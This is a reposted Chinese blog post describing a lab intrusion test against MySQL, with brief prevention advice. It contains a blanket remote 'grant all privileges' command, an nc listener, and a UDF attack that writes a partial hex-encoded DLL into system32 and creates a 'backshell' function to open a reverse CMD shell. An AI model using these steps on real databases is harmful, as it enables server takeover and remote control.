MySql的入侵测试以及防范「建议收藏」

MySql的入侵测试以及防范

大家好,又见面了,我是全栈君。


在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。

总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7

虚拟机:XP

给予mysql远程权限:

1 grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';
2 
3 flush privileges;

 

给物理机远程权限:

MySql的入侵测试以及防范「建议收藏」

物理机成功连接上:

MySql的入侵测试以及防范「建议收藏」

执行侵入测试前(有图有真相):

MySql的入侵测试以及防范「建议收藏」

执行侵入测试后(有图有真相):

MySql的入侵测试以及防范「建议收藏」

重启前(有图有真相):

MySql的入侵测试以及防范「建议收藏」

重启后(有图有真相):

MySql的入侵测试以及防范「建议收藏」

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

MySql的入侵测试以及防范「建议收藏」

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell(“物理机IP”,端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

 

yyd.txt大概内容:

复制代码
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
复制代码

 

 

正题之三:

防范

MySql的入侵测试以及防范「建议收藏」

 

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

 




本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3464215.html,如需转载请自行联系原作者

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/108126.html原文链接:https://javaforall.net

(0)
上一篇 2022年3月7日 下午2:00
下一篇 2022年3月7日 下午3:00


相关推荐

  • cms漏洞扫描_大数据因果溯源分析

    cms漏洞扫描_大数据因果溯源分析CMS系统漏洞分析溯源(第5题)解题思路:登陆页面>>>扫描后台地址>>>登陆地址>>>查看是否可以绕过>>>不可以的话>>>百度管理系统源码>>>分析源码>>>查看登陆页面>>>找到相关php文件>>>admin_name>>>浏览器添加cookie>>>直接访问带有漏洞php文件的页面>>&

    2026年4月15日
    5
  • scala中sorted,sortWith,sortBy用法详解

    scala中sorted,sortWith,sortBy用法详解scala 的集合中提供了三种排序的方式 sorted sortWith sortBy 那么这三种方式有什么不同呢 下面我们结合源码来分析一下 1 sorted 先来看看 scala 中 sorted 的源码 defsorted B A implicitord Ordering B Repr vallen this lengthvalarr newA

    2026年3月19日
    2
  • json几种格式_json的格式

    json几种格式_json的格式JSON的三种格式一、JSON的全称JSON的全称是JavaScriptObjectNotation二、为什么需要JSONJSON有三种格式,每一种写法都和JS中的数据类型很像,可以很轻松的和JS中的数据类型互相转换三、JSON的三种格式(一)、简单值的形式:JSON的简单值的格式对应着JS中的基础数据类型:数字字符串布尔值注意事项:JSON中没有undefinedJSON中的字符串必须使用双引号JSON中是不能用注释的(二)、对象形式:对应着JS中的对象注意事项:

    2022年10月12日
    6
  • 唯一约束和唯一索引区别是什么_db2违反唯一索引的约束

    唯一约束和唯一索引区别是什么_db2违反唯一索引的约束1.主键约束(PRIMARY KEY)1)主键用于唯一地标识表中的每一条记录,可以定义一列或多列为主键。2)是不可能(或很难)更新.3)主键列上没有任何两行具有相同值(即重复值),不允许空(NULL).4)主健可作外健,唯一索引不可;2.唯一性约束(UNIQUE)1)唯一性约束用来限制不受主键约束的列上的数据的唯一性,用于作为访问某行的可选手段

    2025年12月10日
    6
  • 意外发现10个神级n8n工作流,效率起飞!

    意外发现10个神级n8n工作流,效率起飞!

    2026年3月15日
    1
  • 【WebGPU】WebGPU学习清单

    【WebGPU】WebGPU学习清单背景 WebGPU 是基于 Vulkan Metal 和 Direct3D12 而 WebGL 基于 OpenGL 前者的引擎较新 设计上更好的反映了 GPU 硬件技术这些年新的发展 能提供更好的性能 支持多线程 采用了偏面向对象的编程风格

    2026年3月16日
    3

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号